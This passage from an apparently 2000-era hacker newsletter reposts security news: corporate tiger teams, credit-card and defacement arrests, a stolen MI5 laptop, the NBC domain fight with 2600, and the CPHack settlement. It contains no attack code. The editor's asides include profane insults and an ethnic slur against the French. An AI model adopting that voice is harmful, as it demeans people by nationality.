These teams actually exist and, more remarkably, they work largely from within the big firms of accountants. Known as "tiger teams", their brief is to find the holes in the security of their corporate clients before criminal hackers do.

Brick trick

Jan Babiak is head of Ernst & Young's IT security practice. She told me how one of her firm's tiger teams broke into the computer room of a major North American client, deposited a brick marked "Ernst & Young was here" and left again undetected. They then contacted the firm's bosses and said: "Come and see what we've done."

What a great job, don't you think? Kind of James Bond without the disincentive of being shot at. But, of course, it's not quite as simple as that.

Most of the time, the teams are methodically trying to crack passwords to find a chink in the armour of supposedly secure sites.

Chris Potter, partner in charge of similar operations at Pricewaterhouse Coopers, said his 50-strong UK team mainly tries to replicate the techniques of illegal hackers to probe here and there until weaknesses are identified.
Physical break-ins would be rare, he said, and used only when the client had agreed it was appropriate.

Jan Babiak also stressed the importance of not being alarmist: "The smartest thing to do is to understand your risks."

Then, she said, you can develop cost-effective responses that deal with the risk in a way that "delivers good value to shareholders". Now there's the accountant speaking.

How it's done

Often using people with backgrounds in military espionage, tiger teams (the name is derived from the American armed forces) use all kinds of tricks to ply their trade.

For example, they might mount an attempt to hack into a company round the corner via servers dotted all over the world, making it virtually impossible to detect where the attack is coming from.

As the idea is to find the weaknesses in even the most sophisticated security, a wide range of techniques might be used, from wire-tapping to cracking passwords.

A small programme might be secreted on the target system which records and transmits keystrokes from given terminals. On the basis that the password is typed within the first 40 keystrokes, it is then relatively easy to find.

But, as Chris Potter says, the biggest weaknesses are usually not in the technology but in the "human element", and this is where the other side, known as "social engineering" comes in.

In one case, a female member of a tiger team used the age-old weapon of tears to persuade an employee of a target client to give her password details.

In another, a visit to an office masquerading as a cleaner was used to obtain information about personal belongings placed around work terminals. Some Arsenal football club pictures were enough of a clue to make cracking the employee's password easy work.

Making robust systems

Having identified the weaknesses, the team then gives advice on how to change the security system to make it more effective, or even design a system specifically for the client.
Ken Cukier, international editor with technology magazine Red Herring, says the tiger teams provide an essential service in developing robust IT infrastructures.

The business is certainly growing fast - Ernst & Young's team has quadrupled in size in two years.

But Mr Cukier says the talents needed to design a secure system and break that security are not the same, so there needs to be a three-pronged approach to get the best results.

He says the tiger teams are great for checking that a system works, but that they tend to rely on long experience of established techniques.

Bright young things

This can miss out the new ways of hacking being thought up by bright young things messing about with cutting-edge technology on the fringes of Silicon Valley.

Many of them do not want to work for multinational firms and have been founding their own internet start-ups, realising that they have highly marketable skills.

Mr Cukier says combining the tiger teams with the bright young things, along with awareness of the need for constant monitoring of how hacking techniques are changing, produces the best results.

He says: "The best you can ever hope for is to be one step ahead of the hackers."

@HWA

119.0 HNN:Mar 27th:Curador Busted In Wales (See section 110.0 for more)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Brian

Curador (Raphael Gray), suspected of stealing thousands of credit cards from at least nine e-commerce sites and posting them to the Internet, was arrested in Wales last week. Some of Curador's victims included Promobility, a wireless phone merchant in Ontario; SalesGate.com in Buffalo, New York; LTA Media LLC in Knoxville, Tennessee; and Feelgoodfalls.com in Denver. Curador and his accomplice are expected to be charged under Britain's Computer Misuse Act of 1990 for the theft and fraudulent use of more than 26,000 credit card numbers. Additional charges may be filed within the United States.
(Some news outlets are reporting that Curador got a hold of Bill Gates Credit Card info. This was proven to be false several weeks ago. It looks like the UK Telegraph was the first to mention it, and of course several of the wire services picked it up without verifying the information. Don't believe everything you read.)

Internet News
Associated Press - via Yahoo
Reuters
BBC
CNN
C|Net
MSNBC
UK Telegraph
Attrition.org - Mirrors of Curador's Web Sites

http://www.internetnews.com/ec-news/article/0,2171,4_327181,00.
http://dailynews.yahoo.com/h/ap/20000324/tc/hackers_england_2.
http://dailynews.yahoo.com/h/nm/20000324/wr/tech_hackers_1.html
http://news2.thls.bbc.co.uk/hi/english/uk/wales/newsid%5F689000
http://www.cnn.com/2000/TECH/computing/03/24/hackers.wales/
http://news.cnet.com/news/0-1007-200-1583595.html?tag
http://export.msnbc.com/news/386402.asp
http://www.telegraph.co.uk/et?ac
http://www.attrition.org/mirror/attrition/curador.html

----------

@HWA

120.0 HNN:Mar 27th:Inferno Busted in Brazil
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Jackie Chan

The Inferno.br, one of the main underground groups in Brazil, was dismantled last Tuesday by the Sector of Crimes for the Internet of the Civil Policy of Sao Paulo. One of the leaders of the group, known as Jamiez Jamiez or JZ, was apprehended at his residence and had his computer and all related material confiscated. The Inferno had been active since September of 1998 and has taken credit for the defacement of several web pages. Agents involved with the case claim that Microsoft helped them in gaining access to the group's Hotmail account. Investigators expect more arrests of group members in the next few days.

(Note: Information for this article was gathered from a Babelfish Translation and may not be perfect.)
IDG Brazil - Portuguese
Attrition - Mirrors of Inferno.br Defacements

http://www.uol.com.br/idgnow/inet/inet2000-03-23g.shl
http://www.attrition.org/mirror/attrition/inferno.html

----------

@HWA

121.0 HNN:Mar 27th:OSU Students Accused of Stealing Bandwidth
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by lannachi

Payne County prosecutors have accused four Oklahoma State University students of computer fraud. The charges arose after the students ran a cable from a university computer lab to their rooms in Stout Hall. The students were arraigned last week for violation of the computer crimes act.

Tulsa World - at bottom of page
http://search.tulsaworld.com/archivesearch/default.asp?WCI

----------

Server object error 'ASP 0177 : 800a2330'
Server.CreateObject Failed
/archivesearch/default.asp, line 13
The operation completed successfully.

( IOW: it's a 404 ... sorry... BTW if anyone finds, has cached or otherwise stored any missing stories please email the article to me and please reference section # and Issue # ie: 121.0 Issue #52 ... and I'll post it in a future release. Thanks. - Ed )

@HWA

122.0 HNN:Mar 27th:PalmPilot WarDialer Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Kingpin

Vaporware for almost two years the PalmPilot WarDialer known as TBA has been released by Kingpin from L0pht Labs at @Stake. This release expands the possibilities of security scanning and is much cheaper than commercial alternatives, it is FREE.

L0pht Labs Palm OS Development
http://www.l0pht.com/~kingpin/pilot.html

----------

@HWA

123.0 HNN:Mar 27th:Mi5 Computer Stolen
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by dubpunk

It is crucial to remember that your computer security is only as good as your physical security.
MI5, the British Secret Service, has announced that it will tighten its security procedures after a laptop was recently stolen from an agent. MI5 admitted that the laptop may contain information related to Northern Ireland but that it does not contain any sensitive material.

This is London
Reuters - via Iwon

http://www.thisislondon.com/dynamic/news/reprint.html?in_review
http://www.iwon.com/home/technology/tech_article/0,2109,23766|technology|03-24-2000::23:52|reuters,00.html

----------

ORA-06550: line 3, column 11:
PLS-00306: wrong number or types of arguments in call to 'F_VANILLA_REVIEW'
ORA-06550: line 3, column 1:
PL/SQL: Statement ignored

(*SIGH* and ho-hum.. not having a lot of luck capturing articles from some of these new news sites recently!... 404 again on 1st url ... 'thisislondon*' ...sorry... - Ed )

-=-

British Intelligence Laptop Stolen at Station
March 24, 2000 10:51 am EST

LONDON (Reuters) - British police said Friday they were hunting a thief who had stolen a secret service computer containing confidential information on Northern Ireland.

The laptop computer was snatched while an employee of Britain's domestic security service, MI5, was buying a ticket at London's Paddington train station.

"I can confirm that a laptop computer was stolen from the security service employee on March 4 at Paddington Underground (station)," said a government official who declined to be identified.

"The information contained in the laptop was well protected and we believe it to be secure. We are not prepared to discuss the nature of the material."

The information on the computer was understood to be heavily encrypted and was related to the situation in Northern Ireland, but not to refer to the state of the peace process or any guerrilla threat.

A spokesman for Prime Minister Tony Blair said officials were always concerned at the loss of any sensitive material, but they were confident it was secure and that national security had not been threatened.
"We believe this is an opportunistic theft and not a deliberate attempt to gain access to security service information," he said.

Asked why agents were walking around with security information on computers, the spokesman said there were strict procedures for moving classified material. "You can certainly say they've been tightened since this incident," he added.

The Sun newspaper said a squad of 150 police were working around the clock to catch the thief.

Before the start of the 1991 Gulf War in Kuwait and Iraq, a laptop said to have contained war plans was stolen from the car of a Royal Air Force officer, who lost his job as a result.

The latest theft comes as the peace process in Northern Ireland is in disarray. Last month Britain decided to suspend a fledgling home-rule government over lack of progress on disarmament by Irish Republican Army guerrillas.

(For those of you not living in the United Kingdom or Ireland, this is a VERY BAD SCENE to have happen, Brits live in fear of the threat of terrorist bomb attacks on a daily basis and any intelligence to help the murderous IRA and rogue factions could be devastating to any hope of peace in the UK and Northern Ireland ... - Ed)

@HWA

124.0 HNN:Mar 27th:"HNN Wins Bad Ass Media Award"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by SmackDabMedia Mail

The Hacker News Network has won the prestigious Bad Ass Media Site of the Week awarded by Smack Dab Media.

Smack Dab Media
http://www.smackdabmedia.com/badassmediasiteoftheweek.html?004

----------

(Sorry! article has moved! who knows where!? - Ed ...)

@HWA

125.0 HNN:Mar 28th:French Ban Anonymous Internet
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

The French National Assembly has voted on a bill to ban anonymous web hosting. Providing false information to an Internet service provider could result in a six month jail sentence.
The Assembly will take one more vote on the bill before it becomes law.

French National Assembly - PDF in French
http://www.assemblee-nat.fr/2/pdf/ta0473-01.pdf

----------

@HWA

126.0 HNN:Mar 28th:Canada Labeled Hot bed of Computer Terrorism
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles

An American intelligence agency has determined that up to 80 percent of foreign attacks on U.S. computers either originate or pass through Canada. The claim follows suspicions that some recent attacks were routed through Canadian computers.

E-Commerce Times
News Bytes

http://www.ecommercetimes.com/news/articles2000/000327-nb1.shtml
http://www.newsbytes.com/pubNews/00/146343.html

----------

Canada Called Hotbed of Cyberterrorism
By Martin Stone, Newsbytes
Special to the E-Commerce Times
March 27, 2000

An American intelligence agency has determined that up to 80 percent of foreign attacks on U.S. computers either originate or pass through Canada. The claim follows suspicions that some recent hacker attacks were routed through Canadian computers.

A weekend article by the Ottawa Citizen newspaper said a report prepared last year for Canada's Department of National Defence quotes the U.S. Defence Intelligence Agency, the military counterpart to the CIA, as warning that Canada is seen as a "Zone of Vulnerability."

The U.S. Defence Intelligence Agency estimates that a full 80 percent of the attacks upon U.S. systems originate in or pass through Canada, the report stated.

The Citizen noted that the report, prepared by Canadian military and intelligence agencies, including the ultra-secret Communications Security establishment, further said, "It is the assessment of the (Canadian government's) Intelligence Policy Group that the United States and our allies will expect Canada to participate in combating and reducing the cyber threat."

Hacker Haven

FBI Director Louis Freeh recently called Canada a "hacker haven."
FBI investigators believe one or more Canadian Internet servers were used in the attacks that recently disabled Yahoo!, eBay and other U.S.-based commercial sites.

Colonel Randy Alward, commander of the Canadian Forces Information Operations Group, is quoted by the newspaper as saying the high number of hacker attacks coming from Canada is due to a high degree of computerization. The colonel is reported as saying that Canada is a very wired country and that hackers will typically bounce through different computer systems to hide their original location.

Welsh Teens Stage Attacks

The newspaper noted that Canadians, too, can also be the victims of cybercrimes and cited reports of two teenagers in Wales who were recently arrested following an international investigation by the FBI and the Royal Canadian Mounted Police.

The 18-year-olds allegedly used the alias "Curador" to hack into nine e-commerce sites, at least one of which was Canadian, from which they are believed to have stolen more than 26,000 credit card numbers and other personal information, and posted some of it to other hackers.

The Citizen said the cost of canceling the cards and issuing new ones will exceed $3 million (US$), and there may be additional losses if the information was used by others to make purchases.

However, Sam Porteous, director of intelligence for Kroll Associates Canada, a corporate security firm, warned against taking the intelligence estimates too seriously, saying the military often uses broad definitions of what constitutes a cyberattack.

He conceded, though, that Americans have valid concerns about Canada, seeing the country as a conduit they don't have control over, and that unnerves them, he told the newspaper.

The Citizen cites other cyberwarfare specialists who acknowledge that, while Canada has a large population of computer literate citizens, question whether the number of Canadian-launched attacks is as high as the intelligence report suggests.
Thomas Welch of JAWS Technologies, a computer security firm with U.S. and Canadian offices, said he believes the report overstates Canada's role in cyberterrorism and that, while a good percentage does go through or come from Canada, a large percentage of attacks on Canadian sites go via the United States.

-=-

We have some packet kiddies and wannabe crackers make the news and now we're public enemy #1 ... phear Canada .. *gag* (kill the media) - Ed

now excuse me while I load the molson's canadian into my igloo off the skidoo trailer and club some baby seals for supper ... :-o

=-=

Canada Called Hotbed Of Cyberterrorism
By Martin Stone, Newsbytes
OTTAWA, ONTARIO, CANADA, 27 Mar 2000, 8:41 AM CST

Reported by Newsbytes.com, http://www.newsbytes.com . 08:41 CST Reposted 08:59 CST

@HWA

127.0 HNN:Mar 28th:2600 Under Fire From NBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse

NBC is not happy with 2600 Magazine. 2600 has gone and registered fucknbc.com and pointed the domain at nbc.com. NBC somehow feels this is a dilution and inappropriate use of their trademark while 2600 rightfully asserts that it is nothing more than a free speech issue.

2600
ZD Net

http://www.2600.com/news/2000/0323.html
http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2475126,00.html?chkpt

----------

(fucknbc.com? wait for it ... *snicker* ... Emmanuel, what a rebel.. - Ed)

NEW LAWSUIT THREAT FROM NBC
03/23/00

Apparently the corporate media feels it not only owns the Internet, but that it can control opinions and expression as well. Late Wednesday, we received the following letter via email. It concerned one of many "freedom of expression" sites that 2600 is involved with.

----- Forwarded message -----

From: "Lusins, Gillian (NBC)" Gillian.Lusins@nbc.com
To: "'emmanuel@2600.com'" emmanuel@2600.com
Subject: Website
Date: Wed, 22 Mar 2000 17:43:47 -0500
X-Mailer: Internet Mail Service (5.5.2448.0)

Dear Mr. Goldstein,

I am counsel to National Broadcasting Company, Inc. You are listed as the technical contact for the following site: www.fucknbc.com. The site is currently listed as belonging to "CORE - THE INTERNET COUNCIL OF REGISTRARS, and the site is currently pointing to NBC.com. The use of NBC's name in this domain name constitutes trademark infringement, and is also a violation of our copyright interest in the NBC.com site.
Please be aware that a letter is being sent to the listed owners of this site, and that if the site is not taken down immediately, and arrangements made to cease and discontinue all use of this name, we will pursue all necessary legal remedies including instituting litigation in the appropriate venues. Please contact me to discuss this matter upon receipt of this letter at gillian.lusins@nbc.com.

Thank you.

Gillian Lusins

Because e-mail can be altered electronically, the integrity of this communication cannot be guaranteed.

----- End forwarded message -----

It's clear to us that the people at NBC have become separated from some key bits of logic so we will try and help them out. Free speech is at the heart of the net. While companies and other entities are entitled to protect their trademarks, it is entirely acceptable for sites like www.aolsucks.com, www.fuckfrance.com, and even www.fuckgeorgewbush.com to exist without fear of harassment. We invite NBC (or anyone else, but let's give them first crack at it) to register fuck2600.com or 2600sucks.com. And if we feel like registering www.nbcsucksbecausetheyhavelawyerswithtoomuchtimeontheirhands.com, no legal threat is going to convince us not to fight for this very fundamental freedom.

We think NBC may have been confused because we were pointing www.fucknbc.com to www.nbc.com. Perhaps they thought we had STOLEN their web site. We've seen bigger leaps in corporate logic so this conclusion is entirely possible. Let us be clear - we were merely POINTING one site to another, something that is perfectly acceptable in the world of the Internet. If your mortal enemy decides to point his/her site at your site, there's not a damn thing you can do about it, nor should you want to. It's how the net works.

But, since NBC has brought it up, we would like to have this site do something more than what it's doing now. As a first step towards this, we have pointed the site to this new material they so graciously provided us with.
We would like to see a more comprehensive fucknbc site become established. Please email us if you'd like to put together such a site. And if NBC has the guts to apologize, we'll post that too.

-=-

NBC attacks critical domain name

2600.org no longer points to the Peacock's site, but hacker newsletter says it's another case of cyber bullying and an attack on free Web speech.

By Lisa M. Bowman, ZDNet News
March 27, 2000 2:45 PM PT

The hacker newsletter 2600.org has stopped pointing the domain name f--knbc.com to the official NBC Web site after the media company threatened to sue.

NBC alleges that the 2600 site violated both its trademark and copyright interests. 2600 has owned the domain name since late last year.

In an e-mail message to Emmanuel Goldstein, who runs the 2600 site, NBC goes further than just requesting that 2600 stop pointing to NBC. It also claims that the use of NBC's name in this way violates the law, an assertion that raises free-speech issues.

"If the site is not taken down immediately, and arrangements made to cease and discontinue all use of this name, we will pursue all necessary legal remedies including instituting litigation in the appropriate venture," the message from NBC attorney Gillian Lusins reads.

NBC officials could not immediately be reached for comment.

Can ICANN intervene?

Goldstein said he hasn't received a physical letter, and that this is just one of many such battles his group is fighting.

"We're seeing a disturbing increase in corporate intimidation," said Goldstein, who added that 2600.org only changed the URL's destination to call out attention to NBC's ploy. "People need to not buckle to these scare tactics."

The letter comes as board members of ICANN -- the nonprofit private corporation charged with doling out domain names -- are deciding whether to add more top-level domains to the current selection that includes .com, .org and others.
Some nonprofit stakeholders, such as Ralph Nader's Consumer Project on Technology, have proposed adding words such as ".sucks" and ".isnotfair," so that people critical of a particular company or organization would have a place to express their opinion.

However, during a recent board meeting in Cairo, Egypt, ICANN directors didn't seem too receptive of such a plan, pointing out that critics of a company already register domains containing those words, as in "nbcisnotfair."

Companies fighting back

However, NBC's stance shows that companies are inclined to fight the use of such domain names, even if their efforts thwart free speech. NBC joins a growing list of corporations going after not only cybersquatters who violate their trademarks, but also sites that contain content or domains they don't like. But they haven't been too successful in the most public cases.

In January, toy seller eToys Inc. (Nasdaq: ETYS) settled with Swiss art group Etoy, which it had accused of trademark infringement, even though the group had owned the domain before eToys existed. Also, Bally Total Fitness lost an attempt to go after the owners of a domain critical of the company that contained the Bally name.

More 2600.org targets

Meanwhile, 2600.org is still making mischief, saying it has received many proposals to provide content for the f--knbc site and will pick the best one. Right now, the site points to the NBC letter and 2600's side of the story.

"Etoy won their battle, and we believe others will follow if we stick together and refuse to cave in," Goldstein said.

Goldstein and his cohorts also have registered the F--kingmorons.com domain name, which leads to the Motion Picture Association of America -- a trade group that has sued 2600 and others, claiming their plans to crack the code that encrypts DVDs violates laws protecting trade secrets and copyrights.

(Oh yeah, and btw, HWA sez FUCK YOU NBC!
too ..d0rks - Ed)

@HWA

128.0 HNN:Mar 28th:Takedown Debuts in France
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by lamer

Securityfocus.com reports that Takedown, starring Skeet Ulrich as Kevin Mitnick, has been released in France as "Cybertraque." Reviews so far have been poor. The official movie web site and video clip can be found at www.cybertraque.com

Security Focus
http://www.securityfocus.com/news/10

----------

(This must REALLY blow major chunkage to open in France... (!!?!?)... no further comment on this one, we might get nuclear wasted by the dumb frogs fascist gestapo government... seig heil, besides the French mostly suck anyways...we all know this. - Ed)

Mitnick Movie Opens in France
"Takedown" movie finally premieres... dubbed in French.
By Kevin Poulsen
March 27, 2000 1:14 PM PST

It may never make it to theatres in the English speaking world, but a controversial motion picture based on the digital manhunt that snared hacker Kevin Mitnick debuted in France this month, to generally poor reviews and unspectacular box office receipts.

The movie, from Miramax's genre label Dimension Films, is based on the book "Takedown: The Pursuit and Capture of America's Most Wanted Computer Outlaw -- By The Man Who Did It," authored by computer security expert Tsutomu Shimomura and New York Times reporter John Markoff. Shimomura electronically tracked Mitnick to his Raleigh, North Carolina hideout in February, 1995, and sold the book and movie rights for an undisclosed sum amidst the storm of publicity following the fugitive hacker's arrest.

Early versions of the screenplay for the movie adaptation of "Takedown" cast Mitnick -- played by Scream star Skeet Ulrich -- as violent and potentially homicidal. In July, 1998, supporters of the then-imprisoned cyberpunk rallied against the film outside Miramax's New York City offices. Writers later revised the script, and shooting wrapped on the project in December, 1998.
Since then the film has languished without a US release date, amid rumors of a direct-to-video or cable TV release.

The French-dubbed version of the 90 minute film is titled Cybertraque. It opened on March 15th. A promotional web site features streaming video of the theatrical trailer. Miramax publicists didn't return phone calls about the movie.

The exact box office take of Cybertraque is unknown, but receipts failed to crack France's top-ten list on the movie's opening weekend. French critics have generally panned the film. A review in the French newspaper Le Monde notes the film's problems in translating a virtual manhunt to the action-adventure genre.

"Can the repeated image of faces sweating over keyboards renew the principles of the Hollywood thriller?," the paper asks. "It's easy to say that the filmmaker hardly reaches that point, regardless of his saturation of the soundtrack with rock music to defeat the boredom of the viewer." (translated)

Mitnick cracked computers at cell phone companies, universities and ISPs. He pleaded guilty in March, 1999, to seven felonies, and was released from prison on January 21st, 2000, after nearly five years in custody. Last month he testified before a Congressional committee on governmental computer security.

@HWA

129.0 HNN:Mar 28th:Mattel Buys Rights to CPHack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime

CPhack, a program that allows people to defeat Cyber Patrol as well as lists all web sites filtered by the software, has been bought by Mattel. The authors of the program have signed a seven page assignment agreement that gives Mattel "all rights" to the program's source code and binaries. The rights to the program were sold for one dollar and agreement to drop the lawsuit against them.

Wired
http://www.wired.com/news/politics/0,1283,35216,00.html

----------

Mattel Stays on the Offensive
by Declan McCullagh
2:45 p.m. Mar. 27, 2000 PST

BOSTON -- Upping the stakes in a battle over a utility that reveals Cyberpatrol's list of off-limits websites, Mattel threatened mirror sites with contempt charges during a court hearing Monday afternoon.

Mattel, which sells Cyberpatrol, said the toy giant had acquired the copyright to "cphack" from the two cryptoanalysts who published it on their website earlier this month in a settlement agreement signed on March 24.

Citing a March 16 Slashdot thread that said "it's time to mirror!", Mattel attorney Irwin Schwartz advised against anyone thinking of distributing cphack from now on. "They should be afraid of being hauled into court on contempt proceedings," Schwartz told the judge.

Just 25 minutes before the hearing was scheduled to begin, Mattel filed documents with the court saying it was ready to abandon its lawsuit over cphack, which allows owners of Cyberpatrol to view the program's secret encrypted blacklist. As part of the agreement, Mattel said it wanted a permanent court order that applied to mirror sites, too.

The American Civil Liberties Union, which is representing three mirror sites, said it did not object to the lawsuit's dismissal -- but it wanted to make sure its clients would not be at risk.

ACLU attorney Chris Hansen asked U.S. District Judge Edward Harrington to exempt mirror sites from his order, saying Mattel could simply file another suit if it suspected violations of its new copyright. "My clients do not want to be put to the test of contempt," Hansen said. Contempt citations could include fines or jail time.

At the end of the hearing, which lasted one hour, Harrington said he would consider Hansen's request and decide by Wednesday. Harrington said he would continue his earlier temporary restraining order until then. But he indicated he was a little worried about an order that would apply to people who aren't defendants, saying "they have not been heard."
The seven-page "assignment agreement" signed by cphack co-author Eddy Jansson of Sweden gives Mattel "all rights" to the program's source code and binaries and an explanatory essay he wrote. Co-author Matthew Skala of Canada signed a similar agreement giving up his rights for one dollar.

@HWA

130.0 HNN:Mar 28th:Cyber Security Bill Passes Committee
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
S. 1993 was approved by the Senate Governmental Affairs Committee last Thursday. The bill will provide "a comprehensive framework" for protecting federal computer records against cyber-attacks by outside attackers.

Government Executive Magazine
http://www.govexec.com/dailyfed/0300/032400b2.htm

----------

March 24, 2000

DAILY BRIEFING

Senate panel approves cyber-security mandates

By Spencer Rich, National Journal News Service

The Senate Governmental Affairs Committee on Thursday approved legislation (S. 1993) to provide "a comprehensive framework" for protecting federal computer records against cyber-attacks by outside hackers. The bill also seeks to guard against unauthorized disclosures caused by accidental or careless procedures in handling and protecting information.

Co-sponsored by Committee Chairman Fred Thompson, R-Tenn., and Ranking Democrat Joseph Lieberman of Connecticut, the bill passed by voice vote. The Clinton Administration had worked with the committee to iron out some issues in the original version of the bill, according to committee aides.

When the bill was first introduced last Nov. 19, Thompson complained that "federal agencies continue to use a band-aid approach to computer security rather than addressing the systemic problems which make government systems vulnerable to repeated computer attacks."

"Hopefully, the recent breaches of security at the various 'dot.com' companies is the wake-up call needed to focus attention on the security of government computer systems," Thompson said.
At that time, Lieberman also observed, "Government computers are rife with sensitive information ... on national security, the strength of our economy, transportation and communications systems and the personal lives of millions of citizens" -- as well as the mechanisms for controlling weapons of mass destruction, tracking the offensive movements of enemy states and controlling the economy and threats to public health. All these appeared vulnerable to computer hijacking, he said.

Yet, Lieberman said, the General Accounting Office had found that a test unit it set up could crack computerized information systems controlling spacecraft and information gleaned by space exploration, obtain access to State Department networks, veterans' records, tax records and benefit and demographic information. In some cases, the test unit found it would have been able to alter the information in these systems if it wanted to do mischief, he said.

Thompson said the weaknesses of the computer information system were essentially a management issue. To correct this, the bill approved Thursday would set up a tight chain of command and responsibility for strengthening and protecting computer records. It would stretch from the director of the Office of Management and Budget at the top to individual departments and agencies below. Each one's progress in developing plans to strengthen computer security and protecting information would be monitored periodically by an outside agency, such as the GAO.

Each government agency would have to develop a security plan, switch to procedures identified as "best practices," and make sure the relevant employees are properly informed and trained, under the bill.

At the head of this chain of command would be the OMB director.
Under him, Thompson explained at Thursday's committee meeting, the deputy OMB director for management "will be responsible for seeing that agencies do what they should in non-defense areas," and the Secretary of Defense and the Director of Central Intelligence would have similar responsibility with regard to national security, defense and other "classified information systems."

"They must adopt programs and plans that will make us secure," Thompson added.

Thompson said the GAO would monitor the various computer security programs at departments and agencies annually. "This will make it as secure as possible," said Lieberman: "an annual plan and independent audit" of each agency.

According to the committee, the bill, as approved, would:

* Establish clear federal agency accountability for information security.

* Require each agency to have an annual independent evaluation.

* Give the Defense Secretary and CIA director responsibility for national security and other classified information system security. (Addition of this provision was one of the major changes made in the original bill by the substitute text, staff aides said.)

* Give agency managers flexibility to attract the "best and brightest technology talent through the use of scholarships, fellowships and federal service agreements." (This was another major change made by the substitute text, the aides said.)

* Focus on the importance of training programs.

An amendment by Sen. Daniel Akaka, D-Hawaii, added by voice vote, would require agencies to report on the time periods and resources needed to implement agencywide security programs.

@HWA

131.0 HNN:Mar 28th:Census Gets NSA to Look at Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
In an effort to protect the private information of millions of Americans the Commerce Department has asked the NSA to test its online security systems.
Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0327/web-1census-03-27-00.asp

----------

Census tests security

BY Judi Hasson
03/27/2000

The Census Bureau has hired a company to try to break into its Internet site and brought in the super-secret National Security Agency to test Census security systems.

Census officials said they are certain the data is safe but want to make sure there are no vulnerable spots.

"Every day, people are scanning our ports. It’s not just our site. It’s any site," said J. Gary Doyle, who is responsible for systems integration at the Census Bureau.

Among the steps that the Census Bureau has taken to protect the decennial count:

* Hiring the technology firm Science Applications International Corp. to try to break into the Census’ Internet site, where respondents can file online. SAIC began working last week, and there have been no reports of successful entry into the site.

* Enlisting NSA to make sure the site is secure.

* Erecting firewalls to prevent penetration. Among the precautions: prohibiting e-mail from entering the site unless there is a specific address on it and barring outside computers from dialing up the census computer in the building.

* Encrypting all census data from the time it leaves a data scanning center via a secure telephone line until it arrives at the Census computer center in Bowie, Md.

* Making three copies of the data and storing it in different vaults.

* Providing backup systems at the Bowie computer center, including generators and air conditioners.

The Census Bureau’s precautions have gotten high marks from security experts inside and outside government.

"Census is using all of the proper security practices," said Richard Smith, vice president of federal operations at Internet Security Systems Inc. "I would guess the likelihood of someone getting in is small."

(Chant with me: "I hate faulty formatting routines ...down with buggy software!" yeh I know, i'll do it myself one of these days, sure, right after I buy that MS stock ... -Ed)

@HWA

132.0 HNN:Mar 28th:Icomlib 1.0.0 Final Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Javaman
Icomlib is an API for the ICOM PCR1000 computer controlled receiver for UNIX OS's. Currently it has been officially tested to support SunOS, *BSD, Slackware 7 Linux, and SuSE Linux. Along with the API there is a GUI based on the Qt 2.x toolkit for X that supports multiple styles (CDE style, Motif Style, Win95 Style, SGI Style). It also includes command line applications that implement all of the functions in the API, as well as additional functions like logging and log-hit scanning.

Philtered
http://www.philtered.net/projects.phtml

----------

@HWA

133.0 HNN:Mar 28th:China Bans MP3s
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by lamer
In an effort to impose some sort of control over electronic commerce, China's Ministry of Culture has announced laws that ban online sales of imported music and videos and exclude foreign invested Internet companies from selling any audiovisual products. This of course would include MP3s.

ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/china_mp3ban000325.html

----------

@HWA

134.0 HNN:Mar 29th:MostHated to Plead Guilty
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by McIntyre
MostHated (Patrick W. Gregory) is expected to plead guilty to one count of conspiracy to commit telecommunications fraud in the U.S. District Court of the Northern District of Texas. The charges stem from the defacement of the White House web page last May. MostHated is thought to be the leader of Global Hell, a group that has taken credit for defacing over 100 web sites. He could receive up to five years in prison, $250,000 in fines and be forced to pay up to $2.5 million in restitution.
ABC News
http://abcnews.go.com/sections/tech/DailyNews/globalhell000329.html

Attrition.org - Mirrors of Global Hell Defacements
http://www.attrition.org/mirror/attrition/gh.html

----------

March 29 — The co-leader of a teenage cybergang that allegedly hacked into 115 Web sites is expected to plead guilty to conspiracy, marking a victory for the federal government in one of the biggest computer crimes cases yet.

Patrick W. Gregory of Houston and dozens of his teenage cohorts defaced Web sites, deleted data and crashed servers, causing as much as $2.5 million in damages, according to court documents.

The group, which went by the names “total-Ka0s” and “Global Hell,” became a national concern after officials said it hacked the White House site on May 9. The breach prompted the Secret Service temporarily to shut down White House access to the Internet while it scrambled to block the security flaw. The hackers replaced the government’s site with the words, “Why did we hack this domain? Simple, we f***ing could.”

